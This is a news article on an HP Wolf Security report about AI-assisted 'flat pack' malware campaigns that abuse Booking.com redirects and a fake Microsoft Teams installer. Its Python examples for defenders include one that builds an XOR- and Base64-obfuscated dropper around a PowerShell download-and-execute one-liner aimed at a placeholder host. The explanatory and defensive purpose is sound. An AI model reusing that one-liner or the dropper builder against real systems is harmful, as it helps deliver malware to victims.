AI-driven hacking uses Booking.com and Microsoft Teams in vibe coding and “flat pack” malware campaigns


AI is helping cybercriminals to rapidly assemble malware with flat-pack efficiency. It’s almost like buying a sofa from Ikea, and perhaps even easier to put together.

A new Threat Insight Report from HP Wolf Security finds that attackers are prioritizing speed, cost, and efficiency over quality or sophistication – using AI-generated “vibe hacking” scripts and modular “flat pack” malware kits to scale operations.


While technically simple, the campaigns are proving effective at slipping past enterprise defenses by blending in with familiar websites, apps, and software.

Based on data from millions of endpoints running HP Wolf Security, HP threat researchers identified multiple real-world campaigns abusing well-known brands to build user trust and evade detection.

Vibe hacking scripts hidden behind Booking.com

HP researchers said many PDF-based threats blocked in Q4 led to credential and credit card phishing pages. However, PDFs also continue to function as a reliable malware delivery vehicle.

In most cases, the malware is not embedded directly inside the PDF; the document acts as a lure. Attackers use blurred document previews or fake error messages, prompting users to “click to view.”

When clicked, the embedded hyperlink triggers a download from a compromised website.

Campaigns are abusing well-known brands to build user trust and evade detection. Image: HP Wolf Security

In one campaign, the download chain routed the victim through Booking.com before the file arrived – a tactic that increases trust and reduces suspicion.


“This sequence makes it appear that the legitimate site initiated the download and increases the user’s trust in the file,” the report noted.


The downloaded file often masquerades as a harmless document through manipulation of its file name: a double extension such as .pdf.js, or a run of spaces that pushes the real extension out of view, disguises its true format.
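The two naming tricks named above can be checked mechanically before a download is opened. The following is an added example written for this article, not code from HP's report; the extension lists, the approximation of Explorer's "hide extensions for known file types" behaviour and the sample names are assumptions made for illustration.

```python
"""Spot download names that disguise an executable as a document.

Added example for this article (not HP's code). The extension lists and
the sample names are assumptions built for illustration.
"""
import os
import re

# File types Windows runs or hands to a script host on double-click.
EXEC_EXT = {".exe", ".scr", ".msi", ".bat", ".cmd", ".ps1",
            ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".lnk"}
# File types a lure wants the victim to believe they are opening.
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def explorer_display_name(name: str) -> str:
    """Approximate Explorer's default 'hide extensions for known file types':
    the final extension is dropped, so 'Invoice.pdf.js' is shown as 'Invoice.pdf'."""
    root, ext = os.path.splitext(name)
    if ext.strip().lower() in EXEC_EXT | DOC_EXT:
        return root.rstrip()
    return name


def masquerade_indicators(name: str) -> list[str]:
    """Return the reasons a file name looks like a disguised executable.

    An empty list means the name is honest about what it is: either it
    really is a document, or it is an executable that does not pretend
    to be one.
    """
    hits = []
    parts = name.split(".")
    if len(parts) < 2:
        return hits
    real_ext = "." + parts[-1].strip().lower()
    if real_ext not in EXEC_EXT:
        return hits                      # runs as what it claims to be
    # Every extension between the stem and the real one is a claim
    # about the file type; a document extension there is the disguise.
    inner_exts = ["." + p.strip().lower() for p in parts[1:-1]]
    fake = [e for e in inner_exts if e in DOC_EXT]
    if fake:
        hits.append(f"double extension: displayed as {fake[-1]}, executes as {real_ext}")
    if re.search(r"\s{4,}", name):
        hits.append("space padding pushes the real extension out of view")
    return hits


if __name__ == "__main__":
    for sample in ("Booking_Confirmation.pdf",
                   "Booking_Confirmation.pdf.js",
                   "Booking_Confirmation.pdf" + " " * 40 + ".exe"):
        print(repr(explorer_display_name(sample)), masquerade_indicators(sample))
```

The display-name check matters more than it looks: with extensions hidden, the victim sees `Booking_Confirmation.pdf` for both the genuine document and the `.pdf.js` dropper, so a gateway or EDR rule should be judging the real extension, not the one the user sees.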

In this case, the first stage was a JavaScript file that downloaded and executed a PowerShell payload.

The script contained a long Base64-encoded string. Base64 is an encoding, not encryption: it represents arbitrary bytes as printable ASCII letters, digits and a few symbols, which lets attackers tuck script or binary content into what looks like a harmless text blob and defeats naive string matching.

Once decoded, the script XORed the bytes against a key to recover the actual PowerShell instructions. XOR is trivially reversible once the key is known, and the key normally sits in the same script, so the layer defends against casual inspection and signature scanning rather than against analysis.

Notably, while the JavaScript stage was obfuscated, the PowerShell stage was not. HP researchers say this is a growing trend they are seeing in the wild.
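The Base64-then-XOR layering described above is quick to peel off once the literal and the key are located. The following is an added example for this article, not code from HP's report or from the campaign: it builds a constructed JavaScript-style first stage around a placeholder PowerShell one-liner (the `example.invalid` host and the key `k3y!` are made up), extracts the Base64 literal, and decrypts it using the key found in the script. Going one step beyond the article, it also brute-forces a single-byte key when the script does not carry one, by scoring candidate plaintexts for PowerShell idioms.

```python
"""Recover a Base64 + XOR encoded PowerShell stage from a first-stage script.

Added example for this article, not code from HP's report. The dropper text,
the key and the second-stage command are constructed for illustration.
"""
import base64
import re
from itertools import cycle
from typing import Optional

# Constructed second stage: a PowerShell download-and-execute one-liner
# pointing at a placeholder host (hypothetical, not from the report).
STAGE2 = ("$u='http://example.invalid/p.bin';"
          "$d=(New-Object Net.WebClient).DownloadData($u);"
          "IEX ([Text.Encoding]::UTF8.GetString($d))")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def build_dropper(stage2: str, key: bytes, embed_key: bool = True) -> str:
    """Produce a JavaScript-style first stage of the kind described:
    XOR the payload, Base64 it, and drop it in as a long string literal."""
    blob = base64.b64encode(xor_bytes(stage2.encode(), key)).decode()
    lines = [f'var b = "{blob}";']
    if embed_key:
        lines.insert(0, f'var k = "{key.decode()}";')
    lines.append("// decode b with k, then hand the text to powershell.exe")
    return "\n".join(lines)


# A Base64 run of 40+ characters in a string literal is the payload carrier;
# the key, when present, is a short string assigned to a variable.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')
KEY_LITERAL = re.compile(r'var\s+k\s*=\s*"([^"]+)"')
PS_MARKERS = (b"New-Object", b"Invoke-", b"powershell", b"http", b"IEX", b"$")


def score_powershell(data: bytes) -> int:
    """Higher when data is printable text containing PowerShell idioms;
    -1 when it is clearly not text at all."""
    printable = sum(32 <= c < 127 for c in data)
    if printable < 0.95 * len(data):
        return -1
    return sum(data.count(m) * len(m) * 10 for m in PS_MARKERS)


def guess_single_byte_key(data: bytes) -> bytes:
    """Brute-force a one-byte XOR key by scoring every candidate plaintext."""
    best = max(range(256),
               key=lambda k: score_powershell(xor_bytes(data, bytes([k]))))
    return bytes([best])


def decode_stage(script: str, key: Optional[bytes] = None) -> str:
    """Pull the long Base64 literal out of the first stage and decrypt it.
    Key preference: caller-supplied, then the one embedded in the script,
    then a single-byte brute force as a last resort."""
    m = B64_LITERAL.search(script)
    if not m:
        raise ValueError("no Base64 literal of the expected length found")
    raw = base64.b64decode(m.group(1))
    if key is None:
        km = KEY_LITERAL.search(script)
        key = km.group(1).encode() if km else guess_single_byte_key(raw)
    return xor_bytes(raw, key).decode("utf-8", errors="replace")


if __name__ == "__main__":
    dropper = build_dropper(STAGE2, b"k3y!")
    print(dropper)
    print(decode_stage(dropper))
```

The brute-force fallback only covers one-byte keys; for a longer repeating key you would read it out of the decoding routine in the script, as the first path does, since the dropper has to carry it to run at all.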

Fake Microsoft Teams site delivers backdoor

Another campaign leveraged search engine optimization (SEO) poisoning and malvertising to direct victims to a fake Microsoft Teams website.

The malicious site closely resembled Microsoft’s legitimate video comms platform, with only the URL revealing its true nature.


When users clicked “Download Microsoft Teams for Windows,” the site first checked that its payload domain was still active and only then generated the download link in the background. The infrastructure was designed to let attackers rotate domains if one went offline.

Users click “Download Microsoft Teams for Windows,” and the site generates a background link after verifying that its payload domain is active. Image: HP Wolf Security

The installer bundled the legitimate Microsoft Teams setup files alongside additional executables. HP said that this ensured the expected software was installed normally, reducing suspicion.

Among the added components was a signed executable associated with the CapCut video editing application, and a malicious DLL file containing the malware.


Using a technique known as “DLL sideloading,” the signed, legitimate executable loaded the malicious DLL bundled alongside it, so the malware ran inside a trusted, signed process and slipped past security checks that judge a file by its signature.

The final payload was OysterLoader, a backdoor frequently observed prior to ransomware deployment. Once installed, it gives attackers persistent control of the compromised device and the ability to deploy further malware.
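The sideloading described above works because the Windows loader searches an executable's own directory before the system directories, so a DLL dropped next to a signed program can shadow a library the program expects from System32. The following is an added example for this article, not code from HP, Microsoft or the campaign: it walks an extracted installer bundle and reports DLLs that sit beside an EXE and share a name with a library in an illustrative (not exhaustive) list of commonly shadowed system DLLs. The sample bundle it builds in a temporary directory is constructed, and verifying the Authenticode signatures of the flagged files is the next step, not shown here.

```python
"""Triage an installer's extracted directory for DLL sideloading candidates.

Added example for this article, not code from HP or Microsoft. The list of
DLL names and the sample bundle are assumptions built for illustration;
verifying Authenticode signatures is the next step and is not shown here.
"""
import hashlib
import os
import tempfile

# DLL names that an application-directory copy can shadow because the
# loader searches the executable's own directory before the system
# directories. Illustrative subset, not an exhaustive list.
COMMONLY_SIDELOADED = {
    "version.dll", "dbghelp.dll", "winmm.dll", "wininet.dll",
    "cryptbase.dll", "profapi.dll", "userenv.dll", "msimg32.dll",
}


def sha256_file(path: str) -> str:
    """Hash the file so a finding can be pivoted to threat intel later."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def sideload_candidates(root: str) -> list[dict]:
    """Return one record per DLL that sits beside an EXE and shares a name
    with a library the EXE would normally get from the system directory.
    A DLL with a suspicious name but no EXE next to it is not reported."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        if not exes:
            continue
        for f in files:
            if f.lower() in COMMONLY_SIDELOADED:
                findings.append({
                    "dll": f,
                    "beside": exes,
                    "dir": os.path.relpath(dirpath, root),
                    "sha256": sha256_file(os.path.join(dirpath, f)),
                })
    return findings


def build_sample_bundle() -> str:
    """Constructed bundle shaped like the one described: the genuine
    installer at the top level, plus a 'tools' folder with an unrelated
    signed-looking editor EXE and a DLL named after a system library.
    File contents are placeholders; only names and layout matter here."""
    root = tempfile.mkdtemp(prefix="bundle_")
    layout = {
        "Teams_windows_x64.exe": b"placeholder: legitimate installer",
        os.path.join("tools", "video_editor.exe"): b"placeholder: signed host EXE",
        os.path.join("tools", "version.dll"): b"placeholder: malicious DLL",
        os.path.join("tools", "helper.dll"): b"placeholder: ordinary DLL",
        os.path.join("lib", "winmm.dll"): b"placeholder: no EXE beside it",
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for finding in sideload_candidates(build_sample_bundle()):
        print(finding)
```

On a real extraction, the hit list is where signature checks and a look at the host EXE's import table come in: a `version.dll` beside a signed editor binary that imports `version.dll` is the pattern the article describes, and the DLL's own (missing or mismatched) signature is what separates it from the host.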

“Speed and cost over quality”

Alex Holland, Principal Threat Research at HP Security Lab, noted that attackers are deliberately trading sophistication for efficiency.


“It’s the classic project management triangle – speed, quality, and cost. You often sacrifice one of them. What we’re seeing is that many attackers are optimizing for speed and cost, not quality.

“They are not using AI to raise the bar; they’re using it to move faster and reduce effort. The campaigns themselves are basic, but the uncomfortable reality is they still work.”


HP Wolf Security suggests organizations prepare for a growing wave of AI-assisted hacking that relies less on technical brilliance and more on automation, trusted brand impersonation, and modular, reusable components.

